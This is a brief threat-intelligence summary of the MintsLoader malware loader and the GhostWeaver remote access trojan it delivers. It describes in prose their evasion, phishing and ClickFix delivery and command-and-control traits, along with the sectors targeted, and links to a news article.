MintsLoader is a sophisticated malware loader that delivers the GhostWeaver remote access trojan through a multi-faceted infection method, primarily utilizing obfuscated JavaScript and PowerShell scripts. Its capabilities include evading detection and executing various follow-on payloads deployed via phishing campaigns. Affected: Organizations in the industrial, legal, and energy sectors.
Keypoints :
- MintsLoader delivers GhostWeaver trojan using obfuscated JavaScript and PowerShell.
- Utilizes sandbox evasion, domain generation algorithms, and HTTP-based command-and-control communications.
- Detected in phishing campaigns targeting industrial, legal, and energy sectors since early 2023.
- Working with e-crime services like SocGholish and LandUpdate808 to distribute malware.
- Employs social engineering tactics, including ClickFix, to trick users into executing malicious code.
- MintsLoader primarily functions as a loader, focusing on downloading follow-on payloads over HTTP.
- GhostWeaver maintains persistent C2 communication and uses TLS encryption for secure communication.
- Recent campaigns also attempt to deploy Lumma Stealer malware using ClickFix tactics.
Read More: https://thehackernews.com/2025/05/mintsloader-drops-ghostweaver-via.html